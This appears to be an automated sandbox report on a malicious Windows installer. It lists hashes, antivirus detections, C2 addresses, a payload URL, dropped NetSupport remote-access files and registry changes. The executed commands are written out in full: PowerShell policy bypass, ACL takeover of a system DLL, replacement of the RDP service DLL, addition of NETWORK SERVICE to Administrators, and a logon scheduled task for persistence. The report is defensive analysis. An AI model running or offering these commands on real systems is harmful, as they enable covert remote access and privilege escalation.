- * MalFamily: "Malicious"
- * MalScore: 10.0
- * File Name: "Exes_d2a062ca772fa3ace7c7edadbd95eaf7.exe"
- * File Size: 3038197
- * File Type: "PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive"
- * SHA256: "286c980e3caf90286482d6af0de30e4865599f5d8241957344f92b97b6fb88d6"
- * MD5: "d2a062ca772fa3ace7c7edadbd95eaf7"
- * SHA1: "dc13b73487e153711a3955a2ce6678881b3ffc7c"
- * SHA512: "73cd04708c5db5b96622370f756dbed08a0a9dadee739e389d4a9c7fe0f8b146afd4201f738913126e5a220345ac5842f59bcba6e7a9e320d22975701b63016c"
- * CRC32: "41ECBD26"
- * SSDEEP: "49152:94GyKQCCrxxMN7QyaZD6caRSDDqjdeLqybDTefAJR2hcSDrd6V83JY:9zICIMN7QycaRSDDqoLbDwrhcOQi5Y"
- * Process Execution:
- "Exes_d2a062ca772fa3ace7c7edadbd95eaf7.exe",
- "cmd.exe",
- "powershell.exe",
- "takeown.exe",
- "icacls.exe",
- "icacls.exe",
- "icacls.exe",
- "icacls.exe",
- "icacls.exe",
- "icacls.exe",
- "icacls.exe",
- "reg.exe",
- "reg.exe",
- "net.exe",
- "net1.exe",
- "cmd.exe",
- "cmd.exe",
- "services.exe",
- "svchost.exe",
- "WmiPrvSE.exe",
- "WmiPrvSE.exe",
- "svchost.exe",
- "cmd.exe",
- "rundll32.exe",
- "svchost.exe",
- "taskhost.exe",
- "svchost.exe",
- "taskhost.exe",
- "svchost.exe",
- "WerFault.exe",
- "wermgr.exe",
- "rundll32.exe",
- "cmd.exe",
- "rundll32.exe",
- "cmd.exe",
- "updsvc.exe",
- "cmd.exe",
- "schtasks.exe",
- "svchost.exe",
- "taskeng.exe",
- "WerFault.exe",
- "lsm.exe"
- * Executed Commands:
- "\"C:\\Windows\\system32\\cmd.exe\" /C powershell -ExecutionPolicy Bypass -f C:\\Users\\user\\AppData\\Local\\Temp\\shipkat.ps1",
- "powershell -ExecutionPolicy Bypass -f C:\\Users\\user\\AppData\\Local\\Temp\\shipkat.ps1",
- "\"C:\\Windows\\system32\\takeown.exe\" /A /F rfxvmt.dll",
- "\"C:\\Windows\\system32\\icacls.exe\" rfxvmt.dll /inheritance:d",
- "\"C:\\Windows\\system32\\icacls.exe\" rfxvmt.dll /setowner \"NT SERVICE\\TrustedInstaller\"",
- "\"C:\\Windows\\system32\\icacls.exe\" rfxvmt.dll /grant \"NT SERVICE\\TrustedInstaller:F\"",
- "\"C:\\Windows\\system32\\icacls.exe\" rfxvmt.dll /remove \"NT AUTHORITY\\SYSTEM\"",
- "\"C:\\Windows\\system32\\icacls.exe\" rfxvmt.dll /grant \"NT AUTHORITY\\SYSTEM:RX\"",
- "\"C:\\Windows\\system32\\icacls.exe\" rfxvmt.dll /remove BUILTIN\\Administrators",
- "\"C:\\Windows\\system32\\icacls.exe\" rfxvmt.dll /grant BUILTIN\\Administrators:RX",
- "\"C:\\Windows\\system32\\reg.exe\" ADD \"HKLM\\System\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp\" /v PortNumber /t REG_DWORD /d 0x1C21 /f",
- "\"C:\\Windows\\system32\\reg.exe\" add HKLM\\system\\currentcontrolset\\services\\TermService\\parameters /v ServiceDLL /t REG_EXPAND_SZ /d %SystemRoot%\\help\\hlp11.dat /f",
- "\"C:\\Windows\\system32\\net.exe\" localgroup Administrators \"NT AUTHORITY\\NETWORK SERVICE\" /add",
- "\"C:\\Windows\\system32\\cmd.exe\" /c del %temp%\\*.ps1 /f",
- "\"C:\\Windows\\system32\\cmd.exe\" /c del %temp%\\*.txt /f",
- "C:\\Windows\\system32\\wbem\\wmiprvse.exe -secured -Embedding",
- "C:\\Windows\\system32\\net1 localgroup Administrators \"NT AUTHORITY\\NETWORK SERVICE\" /add",
- "C:\\Windows\\System32\\svchost.exe -k NetworkService",
- "C:\\Windows\\System32\\svchost.exe -k LocalSystemNetworkRestricted",
- "taskhost.exe $(Arg0)",
- "C:\\Windows\\System32\\svchost.exe -k WerSvcGroup",
- "C:\\Windows\\system32\\rundll32.exe c:\\windows\\help\\hlp12.dat, deployns",
- "cmd.exe /c rundll32.exe c:\\windows\\help\\hlp12.dat, deployns",
- "C:\\Windows\\system32\\WerFault.exe -u -p 2632 -s 288",
- "\"C:\\Windows\\system32\\wermgr.exe\" \"-queuereporting_svc\" \"C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_d9cea5d53964d256a96f47a4e221d2152335d_cab_091a14dd\"",
- "rundll32.exe c:\\windows\\help\\hlp12.dat, deployns",
- "cmd.exe /c C:\\Windows\\system32\\rundll32.exe c:\\windows\\help\\hlp12.dat,, deployns ns launch",
- "C:\\Windows\\system32\\rundll32.exe c:\\windows\\help\\hlp12.dat,, deployns ns launch",
- "cmd.exe /c start c:\\windows\\temp\\updsvc.exe",
- "cmd.exe /c schtasks /create /tn \"updsvc\" /tr \"c:\\windows\\temp\\updsvc.exe\" /sc onlogon /f",
- "c:\\windows\\temp\\updsvc.exe",
- "schtasks /create /tn \"updsvc\" /tr \"c:\\windows\\temp\\updsvc.exe\" /sc onlogon /f",
- "\"c:\\windows\\temp\\GetUserLang.exe\"",
- "taskeng.exe 1C9308F0-8A41-4006-B814-D2F5B13BEDB5 S-1-5-18:NT AUTHORITY\\System:Service:",
- "taskeng.exe 8D661787-E909-433D-BDE3-477DCB39306A S-1-5-21-0000000000-0000000000-0000000000-1000:Host\\user:Interactive:1",
- "\"C:\\Program Files\\Common Files\\Microsoft Shared\\Office15\\OLicenseHeartbeat.exe\""
- * Signatures Detected:
- "Description": "At least one process apparently crashed during execution",
- "Details":
- "Description": "Creates RWX memory",
- "Details":
- "Description": "Possible date expiration check, exits too soon after checking local time",
- "Details":
- "process": "cmd.exe, PID 980"
- "Description": "Attempts to connect to a dead IP:Port (5 unique times)",
- "Details":
- "IP": "185.225.17.169:443"
- "IP": "8.250.93.254:80"
- "IP": "185.225.17.169:80"
- "IP": "185.225.17.66:443"
- "IP": "192.35.177.64:80"
- "Description": "Loads a driver",
- "Details":
- "driver service name": "\\Registry\\Machine\\System\\CurrentControlSet\\Services\\RDPDR"
- "Description": "Expresses interest in specific running processes",
- "Details":
- "process": "rundll32.exe"
- "process": "winlogon.exe"
- "process": "explorer.exe"
- "Description": "Reads data out of its own binary image",
- "Details":
- "self_read": "process: Exes_d2a062ca772fa3ace7c7edadbd95eaf7.exe, pid: 1500, offset: 0x00000000, length: 0x002e5bf1"
- "self_read": "process: Exes_d2a062ca772fa3ace7c7edadbd95eaf7.exe, pid: 1500, offset: 0x00008c1c, length: 0x002dcfd9"
- "Description": "A process created a hidden window",
- "Details":
- "Process": "Exes_d2a062ca772fa3ace7c7edadbd95eaf7.exe -> \"C:\\Windows\\system32\\cmd.exe\""
- "Process": "rundll32.exe -> cmd.exe"
- "Process": "rundll32.exe -> cmd.exe"
- "Description": "HTTP traffic contains suspicious features which may be indicative of malware related traffic",
- "Details":
- "post_no_referer": "HTTP traffic contains a POST request with no referer header"
- "get_no_useragent": "HTTP traffic contains a GET request with no user-agent header"
- "ip_hostname": "HTTP connection was made to an IP address rather than domain name"
- "suspicious_request": "http://185.225.17.66:443/http://185.225.17.66/fakeurl.htm"
- "suspicious_request": "http://geo.netsupportsoftware.com/location/loca.asp"
- "Description": "Performs some HTTP requests",
- "Details":
- "url": "http://apps.identrust.com/roots/dstrootcax3.p7c"
- "url": "http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab"
- "url": "http://letitbe.icu/2.txt"
- "url": "http://185.225.17.66:443/http://185.225.17.66/fakeurl.htm"
- "url": "http://geo.netsupportsoftware.com/location/loca.asp"
- "Description": "Deletes its original binary from disk",
- "Details":
- "Description": "Tries to suspend Cuckoo threads to prevent logging of malicious activity",
- "Details":
- "Process": "svchost.exe (1760)"
- "Description": "Attempts to stop active services",
- "Details":
- "servicename": "UmRdpService"
- "Description": "A process attempted to delay the analysis task by a long amount of time.",
- "Details":
- "Process": "lsm.exe tried to sleep 435 seconds, actually delayed analysis time by 0 seconds"
- "Process": "powershell.exe tried to sleep 300 seconds, actually delayed analysis time by 0 seconds"
- "Process": "updsvc.exe tried to sleep 356 seconds, actually delayed analysis time by 0 seconds"
- "Process": "WmiPrvSE.exe tried to sleep 900 seconds, actually delayed analysis time by 0 seconds"
- "Process": "svchost.exe tried to sleep 4985 seconds, actually delayed analysis time by 0 seconds"
- "Description": "Attempts to repeatedly call a single API many times in order to delay analysis time",
- "Details":
- "Spam": "services.exe (500) called API GetSystemTimeAsFileTime 10986021 times"
- "Description": "Attempts to execute a Living Off The Land Binary command for post exploitation",
- "Details":
- "MITRE T1078 - schtask": "(Tactic: Execution, Persistence, Privilege Escalation)"
- "Description": "Installs itself for autorun at Windows startup",
- "Details":
- "service name": "RunAsSystem1224"
- "service path": "C:\\Windows\\system32\\rundll32.exe c:\\windows\\help\\hlp12.dat, deployns "
- "key": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\RunAsSystem1224\\ImagePath"
- "data": "C:\\Windows\\system32\\rundll32.exe c:\\windows\\help\\hlp12.dat, deployns "
- "key": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\TermService\\Parameters\\ServiceDLL"
- "data": "%SystemRoot%\\help\\hlp11.dat"
- "task": "cmd.exe /c schtasks /create /tn \"updsvc\" /tr \"c:\\windows\\temp\\updsvc.exe\" /sc onlogon /f"
- "Description": "Creates a hidden or system file",
- "Details":
- "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\590aee7bdd69b59b.customDestinations-ms~RF160e5ac.TMP"
- "file": "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\LocalLow\\Microsoft"
- "file": "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache"
- "file": "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData"
- "file": "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content"
- "file": "C:\\Windows\\Temp\\client32.exe"
- "file": "C:\\Windows\\Temp\\HTCTL32.DLL"
- "file": "C:\\Windows\\Temp\\msvcr100.dll"
- "file": "C:\\Windows\\Temp\\nskbfltr.inf"
- "file": "C:\\Windows\\Temp\\NSM.ini"
- "file": "C:\\Windows\\Temp\\NSM.LIC"
- "file": "C:\\Windows\\Temp\\pcicapi.dll"
- "file": "C:\\Windows\\Temp\\PCICHEK.DLL"
- "file": "C:\\Windows\\Temp\\PCICL32.DLL"
- "file": "C:\\Windows\\Temp\\remcmdstub.exe"
- "file": "C:\\Windows\\Temp\\TCCTL32.DLL"
- "Description": "File has been identified by 24 Antiviruses on VirusTotal as malicious",
- "Details":
- "Bkav": "HW32.Packed."
- "FireEye": "Generic.mg.d2a062ca772fa3ac"
- "Qihoo-360": "HEUR/QVM20.1.8D73.Malware.Gen"
- "McAfee": "Artemis!D2A062CA772F"
- "Cylance": "Unsafe"
- "Alibaba": "Trojan:Win32/Scrami.8a399acb"
- "Symantec": "ML.Attribute.HighConfidence"
- "APEX": "Malicious"
- "Paloalto": "generic.ml"
- "Kaspersky": "HEUR:Trojan.Win32.Scrami.gen"
- "Avast": "Win32:Malware-gen"
- "DrWeb": "Trojan.MulDrop9.28262"
- "Invincea": "heuristic"
- "McAfee-GW-Edition": "BehavesLike.Win32.PUPXCI.vc"
- "Trapmine": "malicious.moderate.ml.score"
- "SentinelOne": "DFI - Malicious PE"
- "Microsoft": "Trojan:Win32/Zpevdo.A"
- "Endgame": "malicious (high confidence)"
- "AegisLab": "Trojan.Win32.Scrami.4!c"
- "ZoneAlarm": "HEUR:Trojan.Win32.Scrami.gen"
- "Acronis": "suspicious"
- "AVG": "Win32:Malware-gen"
- "Cybereason": "malicious.487e15"
- "CrowdStrike": "win/malicious_confidence_100% (D)"
- "Description": "Checks the system manufacturer, likely for anti-virtualization",
- "Details":
- "Description": "Attempts to create or modify system certificates",
- "Details":
- "Description": "Created network traffic indicative of malicious activity",
- "Details":
- "signature": "ET DNS Query to a *.pw domain - Likely Hostile"
- * Started Service:
- "TermService",
- "WerSvc",
- "UmRdpService",
- "RunAsSystem1224"
- * Mutexes:
- "Global\\CLR_CASOFF_MUTEX",
- "TSLicensingLock",
- "CicLoadWinStaWinSta0",
- "Local\\MSCTF.CtfMonitorInstMutexDefault1",
- "Local\\WERReportingForProcess2632",
- "Global\\\\xe5\\x88\\x90\\xc2\\x90",
- "Global\\\\xed\\x95\\xb0\\xc7\\x8f",
- "WERUI_BEX64-d9cea5d53964d256a96f47a4e221d2152335d"
- * Modified Files:
- "C:\\Users\\user\\AppData\\Local\\Temp\\shipkat.ps1",
- "C:\\Users\\user\\AppData\\Local\\Temp\\changes_765543.txt",
- "C:\\Users\\user\\AppData\\Local\\Temp\\nsxA9DA.tmp\\System.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\%ProgramData%\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Windows PowerShell\\Windows PowerShell.lnk",
- "\\??\\PIPE\\srvsvc",
- "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\170M8EJSQ3YRP9VT3GBJ.temp",
- "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\590aee7bdd69b59b.customDestinations-ms~RF160e5ac.TMP",
- "C:\\Windows\\Help\\hlp11.dat",
- "C:\\Windows\\Help\\hlp12.dat",
- "C:\\Windows\\Help\\hlp13.dat",
- "C:\\Windows\\sysnative\\rfxvmt.dll",
- "C:\\Windows\\Temp\\desk.txt",
- "C:\\Windows\\inf\\setupapi.dev.log",
- "\\??\\pipe\\PIPE_EVENTROOT\\CIMV2PROVIDERSUBSYSTEM",
- "\\??\\PIPE\\samr",
- "\\??\\PIPE\\lsarpc",
- "C:\\Windows\\sysnative\\LogFiles\\Scm\\5869f1c1-01d7-41f7-84b7-715672259fa8",
- "C:\\Windows\\sysnative\\LogFiles\\Scm\\4963ad21-c4a5-42a5-b9bd-e441d57204fe",
- "C:\\Windows\\sysnative\\LogFiles\\Scm\\7c74d58e-3ad2-4500-acb9-a97c9d5ed2aa",
- "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\Local\\Temp\\mod.txt",
- "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\Local\\Temp\\dawerwer3434asdf3.dat",
- "C:\\Windows\\Help\\35279.ps1",
- "\\Device\\Termdd",
- "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\Local\\Temp\\aa.txt",
- "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\E0F5C59F9FA661F6F4C50B87FEF3A15A",
- "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\E0F5C59F9FA661F6F4C50B87FEF3A15A",
- "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\94308059B57B3142E455B38A6EB92015",
- "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\94308059B57B3142E455B38A6EB92015",
- "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\Local\\Temp\\Cab8E67.tmp",
- "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\Local\\Temp\\Tar8E78.tmp",
- "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\Local\\Temp\\rep933.bin",
- "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\Local\\Temp\\rep898.zip",
- "C:\\Windows\\Temp\\client32.exe",
- "C:\\Windows\\Temp\\client32.ini",
- "C:\\Windows\\Temp\\HTCTL32.DLL",
- "C:\\Windows\\Temp\\msvcr100.dll",
- "C:\\Windows\\Temp\\nskbfltr.inf",
- "C:\\Windows\\Temp\\NSM.ini",
- "C:\\Windows\\Temp\\NSM.LIC",
- "C:\\Windows\\Temp\\pcicapi.dll",
- "C:\\Windows\\Temp\\PCICHEK.DLL",
- "C:\\Windows\\Temp\\PCICL32.DLL",
- "C:\\Windows\\Temp\\remcmdstub.exe",
- "C:\\Windows\\Temp\\TCCTL32.DLL",
- "C:\\Windows\\Temp\\cksini.exe",
- "C:\\Windows\\Temp\\updsvc.exe",
- "\\Device\\RdpDr",
- "\\??\\root#umbus#0000#65a9a6cf-64cd-480b-843e-32c86e1ba19f",
- "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERA4CE.tmp.appcompat.txt",
- "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERAA1E.tmp.WERInternalMetadata.xml",
- "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERAA7D.tmp.hdmp",
- "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERB943.tmp.mdmp",
- "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_d9cea5d53964d256a96f47a4e221d2152335d_cab_091a14dd\\WERA4CE.tmp.appcompat.txt",
- "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_d9cea5d53964d256a96f47a4e221d2152335d_cab_091a14dd\\WERAA1E.tmp.WERInternalMetadata.xml",
- "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_d9cea5d53964d256a96f47a4e221d2152335d_cab_091a14dd\\WERAA7D.tmp.hdmp",
- "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_d9cea5d53964d256a96f47a4e221d2152335d_cab_091a14dd\\WERB943.tmp.mdmp",
- "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_d9cea5d53964d256a96f47a4e221d2152335d_cab_091a14dd\\Report.wer",
- "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_d9cea5d53964d256a96f47a4e221d2152335d_cab_091a14dd\\Report.wer.tmp",
- "C:\\Windows\\Temp\\mod.txt",
- "C:\\Users\\user\\AppData\\Local\\Temp\\mod.txt",
- "C:\\Windows\\sysnative\\Tasks\\updsvc",
- "\\Device\\LanmanDatagramReceiver",
- "C:\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb",
- "C:\\Windows\\SoftwareDistribution\\DataStore\\Logs\\edb.chk",
- "C:\\Windows\\appcompat\\Programs\\RecentFileCache.bcf"
- * Deleted Files:
- "C:\\Users\\user\\AppData\\Local\\Temp\\nsgA7A6.tmp",
- "C:\\Users\\user\\AppData\\Local\\Temp\\nsxA9DA.tmp",
- "C:\\Users\\user\\AppData\\Local\\Temp\\nsxA9DA.tmp\\System.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\nsxA9DA.tmp\\",
- "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\590aee7bdd69b59b.customDestinations-ms~RF160e5ac.TMP",
- "C:\\Users\\user\\AppData\\Local\\Temp\\changes_765543.txt",
- "C:\\Users\\user\\AppData\\Local\\Temp\\FXSAPIDebugLogFile.txt",
- "C:\\Users\\user\\AppData\\Local\\Temp\\shipkat.ps1",
- "C:\\Users\\user\\AppData\\Local\\Temp\\Exes_d2a062ca772fa3ace7c7edadbd95eaf7.exe",
- "C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\CONFIG\\security.config.cch.1572.23127796",
- "C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\CONFIG\\enterprisesec.config.cch.1572.23127796",
- "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\CLR Security Config\\v2.0.50727.312\\64bit\\security.config.cch.1572.23127796",
- "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\Local\\Temp\\Cab8E67.tmp",
- "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\Local\\Temp\\Tar8E78.tmp",
- "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\Local\\Temp\\rep933.bin",
- "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\Local\\Temp\\rep898.zip",
- "C:\\Windows\\Temp\\client32.exe",
- "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERA4CE.tmp",
- "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERA4CE.tmp.appcompat.txt",
- "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERAA1E.tmp",
- "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERAA1E.tmp.WERInternalMetadata.xml",
- "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERAA7D.tmp",
- "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERAA7D.tmp.hdmp",
- "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERB943.tmp",
- "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERB943.tmp.mdmp",
- "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_d9cea5d53964d256a96f47a4e221d2152335d_cab_091a14dd\\Report.wer.tmp",
- "C:\\Windows\\Tasks\\updsvc.job",
- "C:\\Windows\\SoftwareDistribution\\DataStore\\Logs\\edbtmp.log"
- * Modified Registry Keys:
- "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\LanguageList",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Device Installer\\CurrentStatus",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Device Installer\\CurrentStatus\\StartTime",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Device Installer\\CurrentStatus\\Progress",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Enum\\UMB\\UMB\\1&841921d&0&TSBUS\\Properties",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Enum\\UMB\\UMB\\1&841921d&0&TSBUS\\Properties\\83da6326-97a6-4088-9453-a1923f573b29",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Enum\\UMB\\UMB\\1&841921d&0&TSBUS\\Properties\\83da6326-97a6-4088-9453-a1923f573b29\\00000009",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Enum\\UMB\\UMB\\1&841921d&0&TSBUS\\Properties\\83da6326-97a6-4088-9453-a1923f573b29\\00000009\\00000000",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Enum\\UMB\\UMB\\1&841921d&0&TSBUS\\Properties\\83da6326-97a6-4088-9453-a1923f573b29\\00000009\\00000000\\Type",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Enum\\UMB\\UMB\\1&841921d&0&TSBUS\\Properties\\83da6326-97a6-4088-9453-a1923f573b29\\00000009\\00000000\\Data",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\Setup\\SetupapiLogStatus",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\Setup\\SetupapiLogStatus\\setupapi.dev.log",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Terminal Server\\WinStations\\RDP-Tcp\\PortNumber",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\TermService\\Parameters\\ServiceDLL",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\UmRdpService\\Type",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\WerSvc\\Type",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\RunAsSystem1224",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\RunAsSystem1224\\Type",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\RunAsSystem1224\\Start",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\RunAsSystem1224\\ErrorControl",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\RunAsSystem1224\\ImagePath",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\RunAsSystem1224\\DisplayName",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\RunAsSystem1224\\ObjectName",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\RunAsSystem1224\\DeleteFlag",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Terminal Server\\fDenyTSConnections",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Terminal Server\\FSingleSessionPerUser",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Lsa\\LimitBlankPasswordUse",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\Licensing Core",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Terminal Server\\Licensing Core\\EnableConcurrentSessions",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\AllowMultipleTSSessions",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserList",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserList\\WgaUtilAcc",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows NT\\Terminal Services\\fAllowToGetHelp",
- "HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Control\\Terminal Server\\RCM\\Secrets",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Terminal Server\\RCM\\Secrets\\L$HYDRAENCKEY_28ada6da-d622-11d1-9cb9-00c04fb16e75",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Terminal Server\\RCM\\Certificate",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Terminal Server\\RCM\\Secrets\\L$HYDRAENCKEY_52d1ad03-4565-44f3-8bfd-bbb0591f4b9d",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Terminal Server\\RCM\\CertificateOld",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\Certificates\\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\\Blob",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\Windows Error Reporting\\Consent",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\Windows Error Reporting\\Consent\\DefaultConsent",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\4CBF3D1D-5FEB-4971-B977-59608B4DCACE\\Path",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\4CBF3D1D-5FEB-4971-B977-59608B4DCACE\\Hash",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tree\\updsvc\\Id",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tree\\updsvc\\Index",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\4CBF3D1D-5FEB-4971-B977-59608B4DCACE\\Triggers",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\4CBF3D1D-5FEB-4971-B977-59608B4DCACE\\DynamicInfo",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\ED0D73D7-BC97-46E2-AC55-FD6EB3F72C05\\DynamicInfo",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\Handshake\\1C9308F0-8A41-4006-B814-D2F5B13BEDB5",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\B17E070E-57E3-43F6-96F5-A9A9C921DEBF\\DynamicInfo",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\Handshake\\8D661787-E909-433D-BDE3-477DCB39306A",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\DF000DCA-3FA2-48A6-9E59-C0606F9F8D73\\DynamicInfo",
